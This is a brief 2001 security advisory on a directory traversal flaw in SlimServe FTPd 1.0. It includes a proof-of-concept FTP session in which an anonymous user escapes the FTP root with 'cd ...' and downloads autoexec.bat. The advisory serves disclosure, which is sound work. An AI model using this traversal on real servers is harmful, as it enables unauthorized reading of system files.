Reported March 1, 2001, by Ken Pfeil.

VERSIONS AFFECTED

  • SlimServe FTPd 1.0

DESCRIPTION

A vulnerability exists that lets an attacker break out of FTP root by using relative paths. For example, by connecting to a vulnerable host and issuing the command "cd …" an attacker can access the root directory where the FTP server is running.

 

DEMONSTRATION

Joe Testa also provided the following proof-of concept scenario:

 

C:\> ftp hostname

Connected to vulnerablehost.somewhere.com.

220-SlimServe FTPd 1.0 :: www.whitsoftdev.com.

220 127.0.0.1 connected to vulnerablehost.somewhere.com.

User (vulnerablehost.somewhere.com:(none)): anonymous

230 User anonymous logged in, proceed.

ftp> cd ...

250 CWD command successful.

ftp> get autoexec.bat

200 PORT command successful.

150 Opening data connection for "/.../autoexec.bat".

250 RETR command successful.

ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec.

ftp> bye

 <p></p>

VENDOR RESPONSE

The vendor, WhitSoft Development, has been notified. However, no workaround or fix is currently available.

CREDIT
Discovered by Joe Testa.